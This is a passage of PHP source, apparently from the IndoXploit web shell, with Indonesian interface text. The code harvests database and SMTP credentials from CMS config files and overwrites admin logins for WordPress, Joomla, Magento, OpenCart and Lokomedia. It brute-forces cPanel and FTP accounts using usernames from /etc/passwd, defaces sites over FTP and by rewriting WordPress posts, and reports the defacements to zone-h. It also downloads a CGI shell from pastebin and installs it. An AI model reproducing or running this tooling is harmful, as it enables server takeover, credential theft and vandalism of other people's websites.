  793. $site = ambilkata($config,"sitename = '","'");
  794. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  795. echo "Config => ".$file_conf."<br>";
  796. echo "CMS => Joomla<br>";
  797. if($site == '') {
  798. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  799. } else {
  800. echo "Sitename => $site<br>";
  801. }
  802. if(!$update OR !$conn OR !$db) {
  803. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  804. } else {
  805. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  806. }
  807. mysql_close($conn);
  808. } elseif(preg_match("/WordPress/",$config)) {
  809. $dbhost = ambilkata($config,"DB_HOST', '","'");
  810. $dbuser = ambilkata($config,"DB_USER', '","'");
  811. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  812. $dbname = ambilkata($config,"DB_NAME', '","'");
  813. $dbprefix = ambilkata($config,"table_prefix = '","'");
  814. $prefix = $dbprefix."users";
  815. $option = $dbprefix."options";
  816. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  817. $db = mysql_select_db($dbname);
  818. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  819. $result = mysql_fetch_array($q);
  820. $id = $result[ID];
  821. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  822. $result2 = mysql_fetch_array($q2);
  823. $target = $result2[option_value];
  824. if($target == '') {
  825. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  826. } else {
  827. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  828. }
  829. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  830. echo "Config => ".$file_conf."<br>";
  831. echo "CMS => Wordpress<br>";
  832. echo $url_target;
  833. if(!$update OR !$conn OR !$db) {
  834. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  835. } else {
  836. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  837. }
  838. mysql_close($conn);
  839. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  840. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  841. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  842. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  843. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  844. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  845. $prefix = $dbprefix."admin_user";
  846. $option = $dbprefix."core_config_data";
  847. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  848. $db = mysql_select_db($dbname);
  849. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  850. $result = mysql_fetch_array($q);
  851. $id = $result[user_id];
  852. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  853. $result2 = mysql_fetch_array($q2);
  854. $target = $result2[value];
  855. if($target == '') {
  856. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  857. } else {
  858. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  859. }
  860. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  861. echo "Config => ".$file_conf."<br>";
  862. echo "CMS => Magento<br>";
  863. echo $url_target;
  864. if(!$update OR !$conn OR !$db) {
  865. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  866. } else {
  867. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  868. }
  869. mysql_close($conn);
  870. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  871. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  872. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  873. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  874. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  875. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  876. $prefix = $dbprefix."user";
  877. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  878. $db = mysql_select_db($dbname);
  879. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  880. $result = mysql_fetch_array($q);
  881. $id = $result[user_id];
  882. $target = ambilkata($config,"HTTP_SERVER', '","'");
  883. if($target == '') {
  884. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  885. } else {
  886. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  887. }
  888. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  889. echo "Config => ".$file_conf."<br>";
  890. echo "CMS => OpenCart<br>";
  891. echo $url_target;
  892. if(!$update OR !$conn OR !$db) {
  893. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  894. } else {
  895. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  896. }
  897. mysql_close($conn);
  898. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  899. $dbhost = ambilkata($config,'server = "','"');
  900. $dbuser = ambilkata($config,'username = "','"');
  901. $dbpass = ambilkata($config,'password = "','"');
  902. $dbname = ambilkata($config,'database = "','"');
  903. $prefix = "users";
  904. $option = "identitas";
  905. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  906. $db = mysql_select_db($dbname);
  907. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  908. $result = mysql_fetch_array($q);
  909. $target = $result[alamat_website];
  910. if($target == '') {
  911. $target2 = $result[url];
  912. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  913. if($target2 == '') {
  914. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  915. } else {
  916. $cek_login3 = file_get_contents("$target2/adminweb/");
  917. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  918. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  919. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  920. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  921. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  922. } else {
  923. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  924. }
  925. }
  926. } else {
  927. $cek_login = file_get_contents("$target/adminweb/");
  928. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  929. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  930. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  931. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  932. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  933. } else {
  934. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  935. }
  936. }
  937. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  938. echo "Config => ".$file_conf."<br>";
  939. echo "CMS => Lokomedia<br>";
  940. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  941. echo $url_target2;
  942. } else {
  943. echo $url_target;
  944. }
  945. if(!$update OR !$conn OR !$db) {
  946. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  947. } else {
  948. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  949. }
  950. mysql_close($conn);
  951. }
  952. }
  953. }
  954. } else {
  955. echo "<center>
  956. <h1>Auto Edit User Config</h1>
  957. <form method='post'>
  958. DIR Config: <br>
  959. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  960. Set User & Pass: <br>
  961. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
  962. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
  963. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  964. </form>
  965. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  966. ";
  967. }
  968. } elseif($_GET['do'] == 'cpanel') {
  969. if($_POST['crack']) {
  970. $usercp = explode("\r\n", $_POST['user_cp']);
  971. $passcp = explode("\r\n", $_POST['pass_cp']);
  972. $i = 0;
  973. foreach($usercp as $ucp) {
  974. foreach($passcp as $pcp) {
  975. if(@mysql_connect('localhost', $ucp, $pcp)) {
  976. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  977. } else {
  978. $_SESSION[$ucp] = "1";
  979. $_SESSION[$pcp] = "1";
  980. if($ucp == '' || $pcp == '') {
  981.  
  982. } else {
  983. $i++;
  984. if(function_exists('posix_getpwuid')) {
  985. $domain_cp = file_get_contents("/etc/named.conf");
  986. if($domain_cp == '') {
  987. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  988. } else {
  989. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  990. foreach($domains_cp[1] as $dj) {
  991. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  992. $user_cp_url = $user_cp_url['name'];
  993. if($user_cp_url == $ucp) {
  994. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  995. break;
  996. }
  997. }
  998. }
  999. } else {
  1000. $dom = "<font color=red>function is Disable by system</font>";
  1001. }
  1002. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  1003. }
  1004. }
  1005. }
  1006. }
  1007. }
  1008. if($i == 0) {
  1009. } else {
  1010. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
  1011. }
  1012. } else {
  1013. echo "<center>
  1014. <form method='post'>
  1015. USER: <br>
  1016. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1017. $_usercp = fopen("/etc/passwd","r");
  1018. while($getu = fgets($_usercp)) {
  1019. if($getu == '' || !$_usercp) {
  1020. echo "<font color=red>Can't read /etc/passwd</font>";
  1021. } else {
  1022. preg_match_all("/(.*?):x:/", $getu, $u);
  1023. foreach($u[1] as $user_cp) {
  1024. if(is_dir("/home/$user_cp/public_html")) {
  1025. echo "$user_cp\n";
  1026. }
  1027. }
  1028. }
  1029. }
  1030. echo "</textarea><br>
  1031. PASS: <br>
  1032. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1033. function cp_pass($dir) {
  1034. $pass = "";
  1035. $dira = scandir($dir);
  1036. foreach($dira as $dirb) {
  1037. if(!is_file("$dir/$dirb")) continue;
  1038. $ambil = file_get_contents("$dir/$dirb");
  1039. if(preg_match("/WordPress/", $ambil)) {
  1040. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1041. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1042. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1043. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1044. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1045. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1046. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1047. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1048. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1049. } elseif(preg_match("/^[client]$/", $ambil)) {
  1050. preg_match("/password=(.*?)/", $ambil, $pass1);
  1051. if(preg_match('/"/', $pass1[1])) {
  1052. $pass1[1] = str_replace('"', "", $pass1[1]);
  1053. $pass .= $pass1[1]."\n";
  1054. } else {
  1055. $pass .= $pass1[1]."\n";
  1056. }
  1057. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1058. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1059. }
  1060. }
  1061. echo $pass;
  1062. }
  1063. $cp_pass = cp_pass($dir);
  1064. echo $cp_pass;
  1065. echo "</textarea><br>
  1066. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1067. </form>
  1068. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1069. }
  1070. } elseif($_GET['do'] == 'cpftp_auto') {
  1071. if($_POST['crack']) {
  1072. $usercp = explode("\r\n", $_POST['user_cp']);
  1073. $passcp = explode("\r\n", $_POST['pass_cp']);
  1074. $i = 0;
  1075. foreach($usercp as $ucp) {
  1076. foreach($passcp as $pcp) {
  1077. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1078. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1079. } else {
  1080. $_SESSION[$ucp] = "1";
  1081. $_SESSION[$pcp] = "1";
  1082. if($ucp == '' || $pcp == '') {
  1083. //
  1084. } else {
  1085. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1086. $ftp_conn = ftp_connect($ip);
  1087. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1088. if((!$ftp_login) || (!$ftp_conn)) {
  1089. echo "[+] <font color=red>Login Gagal</font><br><br>";
  1090. } else {
  1091. echo "[+] <font color=lime>Login Sukses</font><br>";
  1092. $fi = htmlspecialchars($_POST['file_deface']);
  1093. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1094. if($deface) {
  1095. $i++;
  1096. echo "[+] <font color=lime>Deface Sukses</font><br>";
  1097. if(function_exists('posix_getpwuid')) {
  1098. $domain_cp = file_get_contents("/etc/named.conf");
  1099. if($domain_cp == '') {
  1100. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1101. } else {
  1102. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1103. foreach($domains_cp[1] as $dj) {
  1104. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1105. $user_cp_url = $user_cp_url['name'];
  1106. if($user_cp_url == $ucp) {
  1107. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1108. break;
  1109. }
  1110. }
  1111. }
  1112. } else {
  1113. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1114. }
  1115. } else {
  1116. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1117. }
  1118. }
  1119. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1120. }
  1121. }
  1122. }
  1123. }
  1124. }
  1125. if($i == 0) {
  1126. } else {
  1127. echo "<br>sukses deface ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
  1128. }
  1129. } else {
  1130. echo "<center>
  1131. <form method='post'>
  1132. Filename: <br>
  1133. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1134. Deface Page: <br>
  1135. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  1136. USER: <br>
  1137. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1138. $_usercp = fopen("/etc/passwd","r");
  1139. while($getu = fgets($_usercp)) {
  1140. if($getu == '' || !$_usercp) {
  1141. echo "<font color=red>Can't read /etc/passwd</font>";
  1142. } else {
  1143. preg_match_all("/(.*?):x:/", $getu, $u);
  1144. foreach($u[1] as $user_cp) {
  1145. if(is_dir("/home/$user_cp/public_html")) {
  1146. echo "$user_cp\n";
  1147. }
  1148. }
  1149. }
  1150. }
  1151. echo "</textarea><br>
  1152. PASS: <br>
  1153. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1154. function cp_pass($dir) {
  1155. $pass = "";
  1156. $dira = scandir($dir);
  1157. foreach($dira as $dirb) {
  1158. if(!is_file("$dir/$dirb")) continue;
  1159. $ambil = file_get_contents("$dir/$dirb");
  1160. if(preg_match("/WordPress/", $ambil)) {
  1161. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1162. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1163. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1164. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1165. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1166. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1167. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1168. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1169. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1170. } elseif(preg_match("/client/", $ambil)) {
  1171. preg_match("/password=(.*)/", $ambil, $pass1);
  1172. if(preg_match('/"/', $pass1[1])) {
  1173. $pass1[1] = str_replace('"', "", $pass1[1]);
  1174. $pass .= $pass1[1]."\n";
  1175. }
  1176. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1177. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1178. }
  1179. }
  1180. echo $pass;
  1181. }
  1182. $cp_pass = cp_pass($dir);
  1183. echo $cp_pass;
  1184. echo "</textarea><br>
  1185. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  1186. </form>
  1187. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1188. }
  1189. } elseif($_GET['do'] == 'smtp') {
  1190. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1191. function scj($dir) {
  1192. $dira = scandir($dir);
  1193. foreach($dira as $dirb) {
  1194. if(!is_file("$dir/$dirb")) continue;
  1195. $ambil = file_get_contents("$dir/$dirb");
  1196. $ambil = str_replace("$", "", $ambil);
  1197. if(preg_match("/JConfig|joomla/", $ambil)) {
  1198. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1199. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1200. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1201. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1202. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1203. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1204. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  1205. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  1206. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  1207. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  1208. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  1209. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  1210. }
  1211. }
  1212. }
  1213. $smpt_hunter = scj($dir);
  1214. echo $smpt_hunter;
  1215. } elseif($_GET['do'] == 'auto_wp') {
  1216. if($_POST['hajar']) {
  1217. $title = htmlspecialchars($_POST['new_title']);
  1218. $pn_title = str_replace(" ", "-", $title);
  1219. if($_POST['cek_edit'] == "Y") {
  1220. $script = $_POST['edit_content'];
  1221. } else {
  1222. $script = $title;
  1223. }
  1224. $conf = $_POST['config_dir'];
  1225. $scan_conf = scandir($conf);
  1226. foreach($scan_conf as $file_conf) {
  1227. if(!is_file("$conf/$file_conf")) continue;
  1228. $config = file_get_contents("$conf/$file_conf");
  1229. if(preg_match("/WordPress/", $config)) {
  1230. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1231. $dbuser = ambilkata($config,"DB_USER', '","'");
  1232. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1233. $dbname = ambilkata($config,"DB_NAME', '","'");
  1234. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1235. $prefix = $dbprefix."posts";
  1236. $option = $dbprefix."options";
  1237. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1238. $db = mysql_select_db($dbname);
  1239. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1240. $result = mysql_fetch_array($q);
  1241. $id = $result[ID];
  1242. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1243. $result2 = mysql_fetch_array($q2);
  1244. $target = $result2[option_value];
  1245. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1246. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1247. echo "<div style='margin: 5px auto;'>";
  1248. if($target == '') {
  1249. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1250. } else {
  1251. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1252. }
  1253. if(!$update OR !$conn OR !$db) {
  1254. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1255. } else {
  1256. echo "<font color=lime>sukses di ganti.</font><br>";
  1257. }
  1258. echo "</div>";
  1259. mysql_close($conn);
  1260. }
  1261. }
  1262. } else {
  1263. echo "<center>
  1264. <h1>Auto Edit Title+Content WordPress</h1>
  1265. <form method='post'>
  1266. DIR Config: <br>
  1267. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1268. Set Title: <br>
  1269. <input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
  1270. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1271. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1272. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1273. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1274. </form>
  1275. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1276. ";
  1277. }
  1278. } elseif($_GET['do'] == 'zoneh') {
  1279. if($_POST['submit']) {
  1280. $domain = explode("\r\n", $_POST['url']);
  1281. $nick = $_POST['nick'];
  1282. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1283. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1284. function zoneh($url,$nick) {
  1285. $ch = curl_init("http://www.zone-h.com/notify/single");
  1286. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1287. curl_setopt($ch, CURLOPT_POST, true);
  1288. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1289. return curl_exec($ch);
  1290. curl_close($ch);
  1291. }
  1292. foreach($domain as $url) {
  1293. $zoneh = zoneh($url,$nick);
  1294. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1295. echo "$url -> <font color=lime>OK</font><br>";
  1296. } else {
  1297. echo "$url -> <font color=red>ERROR</font><br>";
  1298. }
  1299. }
  1300. } else {
  1301. echo "<center><form method='post'>
  1302. <u>Defacer</u>: <br>
  1303. <input type='text' name='nick' size='50' value='IndoXploit'><br>
  1304. <u>Domains</u>: <br>
  1305. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1306. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1307. </form>";
  1308. }
  1309. echo "</center>";
  1310. } elseif($_GET['do'] == 'cgi') {
  1311. $cgi_dir = mkdir('idx_cgi', 0755);
  1312. $file_cgi = "idx_cgi/cgi.izo";
  1313. $isi_htcgi = "AddHandler cgi-script .izo";
  1314. $htcgi = fopen(".htaccess", "w");
  1315. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  1316. $cgi = fopen($file_cgi, "w");
  1317. fwrite($cgi, $cgi_script);
  1318. fwrite($htcgi, $isi_htcgi);
  1319. chmod($file_cgi, 0755);
  1320. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1321. } elseif($_GET['do'] == 'fake_root') {
  1322. ob_start();
  1323. $cwd = getcwd();
  1324. $ambil_user = explode("/", $cwd);
  1325. $user = $ambil_user[2];
  1326. if($_POST['reverse']) {
  1327. $site = explode("\r\n", $_POST['url']);
  1328. $file = $_POST['file'];
  1329. foreach($site as $url) {
  1330. $cek = getsource("$url/~$user/$file");
  1331. if(preg_match("/hacked/i", $cek)) {
  1332. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1333. }
  1334. }
  1335. } else {
  1336. echo "<center><form method='post'>
  1337. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1338. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1339. Domain: <br>
  1340. <textarea style='width: 450px; height: 250px;' name='url'>";
  1341. reverse($_SERVER['HTTP_HOST']);
  1342. echo "</textarea><br>
  1343. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1344. </form><br>
  1345. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1346. }
  1347. } elseif($_GET['do'] == 'adminer') {
  1348. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1349. function adminer($url, $isi) {
  1350. $fp = fopen($isi, "w");
  1351. $ch = curl_init();
  1352. curl_setopt($ch, CURLOPT_URL, $url);
  1353. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1354. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1355. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1356. curl_setopt($ch, CURLOPT_FILE, $fp);
  1357. return curl_exec($ch);
  1358. curl_close($ch);
  1359. fclose($fp);
  1360. ob_flush();
  1361. flush();
  1362. }
  1363. if(file_exists('adminer.php')) {
  1364. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1365. } else {
  1366. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1367. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1368. } else {
  1369. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1370. }
  1371. }
  1372. } elseif($_GET['do'] == 'auto_dwp') {
  1373. if($_POST['auto_deface_wp']) {
  1374. function anucurl($sites) {
  1375. $ch = curl_init($sites);
  1376. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1377. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1378. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1379. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1380. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1381. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1382. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1383. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1384. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1385. $data = curl_exec($ch);
  1386. curl_close($ch);
  1387. return $data;
  1388. }
  1389. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1390. $post = array(
  1391. "log" => "$userr",
  1392. "pwd" => "$pass",
  1393. "rememberme" => "forever",
  1394. "wp-submit" => "$wp_submit",
  1395. "redirect_to" => "$web",
  1396. "testcookie" => "1",
  1397. );
  1398. $ch = curl_init($cek);
  1399. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1400. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1401. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1402. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1403. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1404. curl_setopt($ch, CURLOPT_POST, 1);
  1405. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1406. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1407. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1408. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1409. $data = curl_exec($ch);
  1410. curl_close($ch);
  1411. return $data;
  1412. }
  1413. $scan = $_POST['link_config'];
  1414. $link_config = scandir($scan);
  1415. $script = htmlspecialchars($_POST['script']);
  1416. $user = "indoxploit";
  1417. $pass = "indoxploit";
  1418. $passx = md5($pass);
  1419. foreach($link_config as $dir_config) {
  1420. if(!is_file("$scan/$dir_config")) continue;
  1421. $config = file_get_contents("$scan/$dir_config");
  1422. if(preg_match("/WordPress/", $config)) {
  1423. $dbhost = ambilkata($config,"DB_HOST', '","'");
